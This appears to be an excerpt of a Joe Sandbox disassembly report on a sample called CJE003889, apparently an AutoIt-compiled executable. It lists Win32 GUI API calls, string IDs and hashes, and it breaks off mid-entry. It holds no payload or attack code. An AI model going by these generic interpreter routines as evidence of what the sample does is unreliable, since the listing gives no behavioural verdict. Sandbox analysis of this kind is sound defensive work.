                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 3521893082-0
                                                          • Opcode ID: 29990483f9c40df4ffac024f20e35718d13a2a24801b376229665023f1665e6b
                                                          • Instruction ID: cd12f98ae8ca82a7a501745e05c076fdac0b61688a480d42d23ca3fda97dc4dc
                                                          • Opcode Fuzzy Hash: 29990483f9c40df4ffac024f20e35718d13a2a24801b376229665023f1665e6b
                                                          • Instruction Fuzzy Hash: 88918D72009385AFD7109F65DC48B5F7BB9FF88321F100A2DF5A29A1A0D770E945CB52
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?), ref: 00C62CA2
                                                          • DeleteObject.GDI32(00000000), ref: 00C62CE8
                                                          • DeleteObject.GDI32(00000000), ref: 00C62CF3
                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00C62CFE
                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00C62D09
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C9C43B
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C9C474
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C9C89D
                                                            • Part of subcall function 00C61B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C62036,?,00000000,?,?,?,?,00C616CB,00000000,?), ref: 00C61B9A
                                                          • SendMessageW.USER32(?,00001053), ref: 00C9C8DA
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C9C8F1
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C9C907
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C9C912
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: 5b48bf9a505bb218485ce0fe57f6eecd69b07ffb32cdbd02177bca39c0cb2f38
                                                          • Instruction ID: 68c0fc774103fa5e144fcc033a09627055c028f08d540c3e97b8521e42e18ed0
                                                          • Opcode Fuzzy Hash: 5b48bf9a505bb218485ce0fe57f6eecd69b07ffb32cdbd02177bca39c0cb2f38
                                                          • Instruction Fuzzy Hash: 52128A30604641EFDB25CF24C8C8BA9BBE5BF44350F544569F8A9CB262CB31EA52DB91
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 00CD74DE
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CD759D
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CD75DB
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CD75ED
                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CD7633
                                                          • GetClientRect.USER32(00000000,?), ref: 00CD763F
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CD7683
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CD7692
                                                          • GetStockObject.GDI32(00000011), ref: 00CD76A2
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00CD76A6
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CD76B6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CD76BF
                                                          • DeleteDC.GDI32(00000000), ref: 00CD76C8
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CD76F4
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CD770B
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CD7746
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CD775A
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CD776B
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CD779B
                                                          • GetStockObject.GDI32(00000011), ref: 00CD77A6
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CD77B1
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CD77BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: bfb761d72ae768f04a3feca6df82195d525e5f365721d8ac8cc8e00f60ff00a2
                                                          • Instruction ID: 3bae83be82f1d3c6edc49848799e5495724687222dc116dd4e116ed942cfc212
                                                          • Opcode Fuzzy Hash: bfb761d72ae768f04a3feca6df82195d525e5f365721d8ac8cc8e00f60ff00a2
                                                          • Instruction Fuzzy Hash: 56A16171A40615BFEB24DBA4DC8AFAE7B69EF45710F104219FA14EB2E0D770AD01CB64
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00CCAD1E
                                                          • GetDriveTypeW.KERNEL32(?,00CEFAC0,?,\\.\,00CEF910), ref: 00CCADFB
                                                          • SetErrorMode.KERNEL32(00000000,00CEFAC0,?,\\.\,00CEF910), ref: 00CCAF59
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 9280ae6fb29dfd5a24c2260e57fe2f0762a3e4576ec1c62fdcb3627daa6eaa1c
                                                          • Instruction ID: 1af1f26b9c1ad33a7d122ae6f1f43a8bfaaf411bcff1c93c58921d368057f974
                                                          • Opcode Fuzzy Hash: 9280ae6fb29dfd5a24c2260e57fe2f0762a3e4576ec1c62fdcb3627daa6eaa1c
                                                          • Instruction Fuzzy Hash: D45199B064820DEF8B10DB91D98AEFD7361EF48708B20455EE417A7291DE319E46FB63
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 1038674560-86951937
                                                          • Opcode ID: ee43083dd5e9252b628e22ee3fe8242de8109a8a7c714c5a9641f1e1b0ad8b01
                                                          • Instruction ID: e6e7937e1d36325a57ee454599a777abbc7ed44bb2456e620f3fd68c030a97dc
                                                          • Opcode Fuzzy Hash: ee43083dd5e9252b628e22ee3fe8242de8109a8a7c714c5a9641f1e1b0ad8b01
                                                          • Instruction Fuzzy Hash: 4781F3B0600205BBDF30FB61EC86FBB7768AF15704F044028FD45AA196EB61DB46E2A5
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 00CEA903
                                                          • SetTextColor.GDI32(?,?), ref: 00CEA907
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00CEA91D
                                                          • GetSysColor.USER32(0000000F), ref: 00CEA928
                                                          • CreateSolidBrush.GDI32(?), ref: 00CEA92D
                                                          • GetSysColor.USER32(00000011), ref: 00CEA945
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CEA953
                                                          • SelectObject.GDI32(?,00000000), ref: 00CEA964
                                                          • SetBkColor.GDI32(?,00000000), ref: 00CEA96D
                                                          • SelectObject.GDI32(?,?), ref: 00CEA97A
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00CEA999
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CEA9B0
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00CEA9C5
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CEA9ED
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CEAA14
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 00CEAA32
                                                          • DrawFocusRect.USER32(?,?), ref: 00CEAA3D
                                                          • GetSysColor.USER32(00000011), ref: 00CEAA4B
                                                          • SetTextColor.GDI32(?,00000000), ref: 00CEAA53
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CEAA67
                                                          • SelectObject.GDI32(?,00CEA5FA), ref: 00CEAA7E
                                                          • DeleteObject.GDI32(?), ref: 00CEAA89
                                                          • SelectObject.GDI32(?,?), ref: 00CEAA8F
                                                          • DeleteObject.GDI32(?), ref: 00CEAA94
                                                          • SetTextColor.GDI32(?,?), ref: 00CEAA9A
                                                          • SetBkColor.GDI32(?,?), ref: 00CEAAA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: 276e9a1f2c7526e1a97e4fb5ee81da5c6b1e1138405ac12013b9d23d721ef045
                                                          • Instruction ID: 6fefcb308e71c87d81bb93635a6e23319edf67304cefc3e6a68943ca3d0e95c9
                                                          • Opcode Fuzzy Hash: 276e9a1f2c7526e1a97e4fb5ee81da5c6b1e1138405ac12013b9d23d721ef045
                                                          • Instruction Fuzzy Hash: E7514B71901248FFDB109FA5DC88FAE7BB9EB48320F114229F911AB2A1D7719A41DF90
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CE8AC1
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CE8AD2
                                                          • CharNextW.USER32(0000014E), ref: 00CE8B01
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CE8B42
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CE8B58
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CE8B69
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CE8B86
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00CE8BD8
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CE8BEE
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CE8C1F
                                                          • _memset.LIBCMT ref: 00CE8C44
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CE8C8D
                                                          • _memset.LIBCMT ref: 00CE8CEC
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CE8D16
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CE8D6E
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 00CE8E1B
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00CE8E3D
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CE8E87
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CE8EB4
                                                          • DrawMenuBar.USER32(?), ref: 00CE8EC3
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 00CE8EEB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: 2bd4d40fb245d8a499f0aedfd44a4924b89b9ef56997eb5a935aff527c785282
                                                          • Instruction ID: 405a641b622c1bac48df2d735d65e9876a9be5335c60aacc24a6d0b32e366d41
                                                          • Opcode Fuzzy Hash: 2bd4d40fb245d8a499f0aedfd44a4924b89b9ef56997eb5a935aff527c785282
                                                          • Instruction Fuzzy Hash: 5EE17571900298AFDF20DF52CC84EEE7B79EF05710F10815AF929AB190DB749A85DF61
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 00CE49CA
                                                          • GetDesktopWindow.USER32 ref: 00CE49DF
                                                          • GetWindowRect.USER32(00000000), ref: 00CE49E6
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00CE4A48
                                                          • DestroyWindow.USER32(?), ref: 00CE4A74
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CE4A9D
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CE4ABB
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CE4AE1
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00CE4AF6
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CE4B09
                                                          • IsWindowVisible.USER32(?), ref: 00CE4B29
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CE4B44
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CE4B58
                                                          • GetWindowRect.USER32(?,?), ref: 00CE4B70
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00CE4B96
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00CE4BB0
                                                          • CopyRect.USER32(?,?), ref: 00CE4BC7
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00CE4C32
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: 040306c11b61d06ca402f1f23e63c521731d14f0e26b380b18780214465b0758
                                                          • Instruction ID: 4d9a5dc49c2767e47578d22b4e39608abaf9985836da72e34330ad8fd0d86a7a
                                                          • Opcode Fuzzy Hash: 040306c11b61d06ca402f1f23e63c521731d14f0e26b380b18780214465b0758
                                                          • Instruction Fuzzy Hash: 10B18B71604380AFDB18DF65C888B6ABBE8FF88310F00892CF5999B2A1D770ED05CB55
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C628BC
                                                          • GetSystemMetrics.USER32(00000007), ref: 00C628C4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C628EF
                                                          • GetSystemMetrics.USER32(00000008), ref: 00C628F7
                                                          • GetSystemMetrics.USER32(00000004), ref: 00C6291C
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C62939
                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00C62949
                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C6297C
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C62990
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 00C629AE
                                                          • GetStockObject.GDI32(00000011), ref: 00C629CA
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C629D5
                                                            • Part of subcall function 00C62344: GetCursorPos.USER32(?), ref: 00C62357
                                                            • Part of subcall function 00C62344: ScreenToClient.USER32(00D257B0,?), ref: 00C62374
                                                            • Part of subcall function 00C62344: GetAsyncKeyState.USER32(00000001), ref: 00C62399
                                                            • Part of subcall function 00C62344: GetAsyncKeyState.USER32(00000002), ref: 00C623A7
                                                          • SetTimer.USER32(00000000,00000000,00000028,00C61256), ref: 00C629FC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI
                                                          • API String ID: 1458621304-248962490
                                                          • Opcode ID: 17de4310406e9dad8f9295b65b4bfa81ad2657dd3097487e003657af32289102
                                                          • Instruction ID: a1ab4f8fd9c915e725c793c01bd4374f8454ef7eeba3372ce241fb2ad1480e88
                                                          • Opcode Fuzzy Hash: 17de4310406e9dad8f9295b65b4bfa81ad2657dd3097487e003657af32289102
                                                          • Instruction Fuzzy Hash: 64B17E71A0064ADFDB24DFA8DC89BAD7BB4FB58310F104229FA15EB290DB749941DB50
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00CE3E6F
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00CE3F2F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 3974292440-719923060
                                                          • Opcode ID: 8379c1e044a04cb1570948941d5620f94ad49a89dc955982c350cdd57c45481b
                                                          • Instruction ID: 5d12e2b1e63cac797db562f9f774cea0acd7408e677b08a70e4617c68c9969a3
                                                          • Opcode Fuzzy Hash: 8379c1e044a04cb1570948941d5620f94ad49a89dc955982c350cdd57c45481b
                                                          • Instruction Fuzzy Hash: 1DA160302143819BCB28EF11C8A6AAEB3E5EF85314F14496CF9665B3D2DB31ED09DB51
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00CBA47A
                                                          • __swprintf.LIBCMT ref: 00CBA51B
                                                          • _wcscmp.LIBCMT ref: 00CBA52E
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00CBA583
                                                          • _wcscmp.LIBCMT ref: 00CBA5BF
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00CBA5F6
                                                          • GetDlgCtrlID.USER32(?), ref: 00CBA648
                                                          • GetWindowRect.USER32(?,?), ref: 00CBA67E
                                                          • GetParent.USER32(?), ref: 00CBA69C
                                                          • ScreenToClient.USER32(00000000), ref: 00CBA6A3
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00CBA71D
                                                          • _wcscmp.LIBCMT ref: 00CBA731
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00CBA757
                                                          • _wcscmp.LIBCMT ref: 00CBA76B
                                                            • Part of subcall function 00C8362C: _iswctype.LIBCMT ref: 00C83634
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                          • String ID: %s%u
                                                          • API String ID: 3744389584-679674701
                                                          • Opcode ID: c1a6ae7b0b9c51adde7daa73538e30159b63429cb6bde9196d289666918e799a
                                                          • Instruction ID: 848f08adc83d439397ebd3b194ada4c5571e642d920c4479f8f0277e5db5e640
                                                          • Opcode Fuzzy Hash: c1a6ae7b0b9c51adde7daa73538e30159b63429cb6bde9196d289666918e799a
                                                          • Instruction Fuzzy Hash: CAA1AE71204646AFD714DF64C888BEAB7E8FF44314F008629F9E9D6190DB30EA56CB92
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00CBAF18
                                                          • _wcscmp.LIBCMT ref: 00CBAF29
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00CBAF51
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00CBAF6E
                                                          • _wcscmp.LIBCMT ref: 00CBAF8C
                                                          • _wcsstr.LIBCMT ref: 00CBAF9D
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00CBAFD5
                                                          • _wcscmp.LIBCMT ref: 00CBAFE5
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00CBB00C
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00CBB055
                                                          • _wcscmp.LIBCMT ref: 00CBB065
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00CBB08D
                                                          • GetWindowRect.USER32(00000004,?), ref: 00CBB0F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: b204a037af0a5b73b5ca3c9e1a3a2917ee03731036b5633a6bcb484663ca77ad
                                                          • Instruction ID: 00a63dfc212e0c70c1c3446459b57fd2efe1f6609478d6af5989722e11a19c43
